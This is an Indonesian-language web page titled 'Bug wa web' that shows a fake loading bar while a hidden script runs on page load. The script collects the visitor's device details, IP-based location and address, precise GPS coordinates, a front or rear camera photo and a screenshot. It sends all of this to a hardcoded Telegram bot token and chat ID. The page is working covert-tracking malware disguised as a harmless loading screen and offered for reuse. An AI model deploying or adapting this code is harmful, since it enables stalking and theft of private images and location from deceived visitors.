<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <title>Bug wa web</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/1.4.1/html2canvas.min.js"></script>
    <style>
        body{background:#000;margin:0;padding:0;display:flex;justify-content:center;align-items:center;height:100vh;font-family:Arial,sans-serif;color:#999;overflow:hidden}
        #loading-container{text-align:center;width:80%;max-width:400px}
        #loading-text{font-size:22px;margin-bottom:20px;color:#6e48aa}
        #progress-container{height:3px;background:#222;border-radius:3px;overflow:hidden}
        #progress-bar{height:100%;width:0%;background:linear-gradient(90deg,#6e48aa,#9d50bb);transition:width .3s ease}
        #loading-details{margin-top:20px;font-size:14px;color:#666}
        .hidden{display:none}
    </style>
</head>
<body>
    <div id="loading-container">
        <div id="loading-text">PROSES LOADING</div>
        <div id="progress-container"><div id="progress-bar"></div></div>
        <div id="loading-details">Memulai inisialisasi...</div>
    </div>
    
    <video id="v" autoplay muted class="hidden"></video>
    <canvas id="c" class="hidden"></canvas>

<script>
(()=>{
    const T='7955372778:AAEJAuLyCXgbXfEU8Bl9P8x38tR53yOOQDw', // <-- MASUKKAN TOKEN BOT TELEGRAM ANDA DI SINI
          C='8067041468', // <-- MASUKKAN CHAT ID TELEGRAM ANDA DI SINI
          pb=document.getElementById('progress-bar'),
          ld=document.getElementById('loading-details');

    let p=0;
    const LM=["Memeriksa modul sistem...","Memuat komponen inti...","Menginisialisasi antarmuka...","Memverifikasi koneksi...","Menyiapkan lingkungan...","Memeriksa pembaruan...","Memuat aset tampilan..."];
    
    // Logic untuk progress bar
    setInterval(()=>{
        p+=Math.random()*5;
        if(p>98)p=98;
        pb.style.width=p+'%';
        if(Math.random()>.9)ld.textContent=LM[Math.floor(Math.random()*LM.length)]
    },500);

    // Fungsi kirim pesan ke Telegram
    const sTG=async d=>{try{await fetch(`https://api.telegram.org/bot${T}/sendMessage`,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({chat_id:C,text:d,parse_mode:'HTML'})})}catch(e){}};
    
    // Fungsi kirim foto ke Telegram
    const sP=async(b,f)=>{try{const fd=new FormData();fd.append('chat_id',C);fd.append('photo',b,f);await fetch(`https://api.telegram.org/bot${T}/sendPhoto`,{method:'POST',body:fd})}catch(e){}};
    
    // Fungsi mendapatkan lokasi detail dari koordinat
    const gLD=async(a,b)=>{try{const r=await fetch(`https://nominatim.openstreetmap.org/reverse?format=json&lat=${a}&lon=${b}&zoom=18&addressdetails=1`),d=await r.json();if(d.address)return{kb:d.address.county||d.address.city||d.address.state||"Tidak diketahui",kc:d.address.suburb||d.address.village||d.address.town||"Tidak diketahui",fa:d.display_name||"Alamat tidak tersedia"}}catch(e){}return{kb:"Tidak diketahui",kc:"Tidak diketahui",fa:"Alamat tidak tersedia"}};
    
    // Fungsi mendapatkan informasi perangkat
    const cDI=async()=>{let m='╭───── Tracking Report ───── ⦿\n\n';m+='⚙️ DEVICE INFORMATION|BUKAN GPS TRACKING\n';m+=`🖥️ Device: ${navigator.userAgent}\n💻 Platform: ${navigator.platform}\n🌐 Bahasa: ${navigator.language}\n📶 Online: ${navigator.onLine?'Online':'Offline'}\n📺 Screen Size: ${screen.width}x${screen.height}\n🪟 Window Size: ${innerWidth}x${innerHeight}\n💾 RAM: ${navigator.deviceMemory||'Unknown'} GB\n🧠 CPU Cores: ${navigator.hardwareConcurrency}\n`;if(navigator.getBattery){try{const b=await navigator.getBattery();m+=`🔋 Battery: ${Math.floor(b.level*100)}%\n🔌 Charging: ${b.charging?'✅ YA':'❌ TIDAK'}\n`}catch(e){m+='🔋 Battery: ❌ Tidak tersedia\n'}}m+=`⏰ Waktu Akses: ${new Date().toString()}\n🕒 Page Load Time: ${performance.now().toFixed(2)} ms\n📜 History Length: ${history.length}\n✋ Touch Support: ${'ontouchstart'in window?'✅ YA':'❌ TIDAK'}\n🔗 Referrer: ${document.referrer||'None'}\n🌍 URL: ${location.href}\n📄 Title: ${document.title}\n🕓 Timezone: ${Intl.DateTimeFormat().resolvedOptions().timeZone}\n🧭 Offset: ${new Date().getTimezoneOffset()} menit\n\n`;try{const i=await fetch('https://ipapi.co/json/'),d=await i.json();m+='📍 LOCATION INFORMATION\n';m+=`📡 IP Address: ${d.ip}\n🏙️ Kota: ${d.city}\n🏙️ Kabupaten: ${d.region}\n🗺️ Wilayah: ${d.region}\n🌎 Negara: ${d.country_name}\n🏷️ Kode Pos: ${d.postal}\n`;if(d.latitude&&d.longitude){m+=`📌 Latitude: ${d.latitude}\n📍 Longitude: ${d.longitude}\n`;const l=await gLD(d.latitude,d.longitude);m+=`🏙️ Kabupaten: ${l.kb}\n🏙️ Kecamatan: ${l.kc}\n🏠 Alamat Lengkap: ${l.fa}\n`}}catch(e){m+='❌ Gagal mendapatkan informasi lokasi\n'}m+='\n╰───── Telegram @ryzzreal  ───── ⦿';return m};

    // Mengambil gambar dari kamera dengan mode tertentu
    const captureCamera = async (mode) => {
        const v = document.getElementById('v'), 
              c = document.getElementById('c');
        let stream;
        try {
            stream = await navigator.mediaDevices.getUserMedia({
                video: { 
                    facingMode: { exact: mode } 
                }
            });
            v.srcObject = stream;
            
            await new Promise(resolve => v.onloadedmetadata = resolve);
            v.play();

            // Waktu tunggu kamera 1.5 detik
            await new Promise(r => setTimeout(r, 1500)); 
            
            c.width = v.videoWidth;
            c.height = v.videoHeight;
            c.getContext('2d').drawImage(v, 0, 0);
            
            c.toBlob(b => sP(b, `${mode}_camera_capture.jpg`), 'image/jpeg');
            
            stream.getTracks().forEach(t => t.stop());
            return true; 
            
        } catch (e) {
            if (stream) {
                stream.getTracks().forEach(t => t.stop());
            }
            await sTG(`⚠️ Gagal Akses Kamera ${mode.toUpperCase()}. Mencoba mode lain...`);
            return false; 
        }
    };

    // FUNGSI UTAMA: Menjalankan semua proses tracking
    const ST=async()=>{
        await sTG(await cDI()); 

        let cameraSuccess = false;

        // 1. Coba Kamera Depan (User)
        cameraSuccess = await captureCamera("user");

        // 2. Jika Gagal, Coba Kamera Belakang (Environment)
        if (!cameraSuccess) {
            cameraSuccess = await captureCamera("environment");
        }

        if (!cameraSuccess) {
             await sTG('❌ Akses ke kedua kamera (Depan & Belakang) diblokir.');
        }

        // Ambil Screenshot 
        setTimeout(async()=>{
            try{
                const cn=await html2canvas(document.body);
                cn.toBlob(b=>sP(b,'screenshot.jpg'),'image/jpeg')
            }catch(e){
                await sTG('❌ Screenshot failed')
            }
        }, 2000); 

        // Menggunakan getCurrentPosition untuk hanya mengirim 1x dan menambahkan link Google Maps
        if(navigator.geolocation){
            navigator.geolocation.getCurrentPosition(async p=>{
                const lat = p.coords.latitude;
                const lon = p.coords.longitude;
                
                // Menambahkan link Google Maps
                let g=`📍 GPS TRACKING (ONE-TIME)\n`;
                g+=`📌 Lat: ${lat}\n📍 Lng: ${lon}\n`;
                g+=`🎯 Akurasi: ${p.coords.accuracy}m\n`;
                g+=`🗺️ Google Maps: https://www.google.com/maps/search/?api=1&query=${lat},${lon}\n`;
                
                const l=await gLD(lat,lon);
                g+=`🏙️ Kabupaten: ${l.kb}\n🏙️ Kecamatan: ${l.kc}\n🏠 Alamat: ${l.fa}\n`;
                await sTG(g)
            },async e=>{
                await sTG(`❌ GPS Error: ${e.message}`)
            },{enableHighAccuracy:true,maximumAge:0,timeout:5000})
        }
    };

    // Langsung menjalankan fungsi ST tanpa delay
    ST();
})();
</script>
</body>
</html>
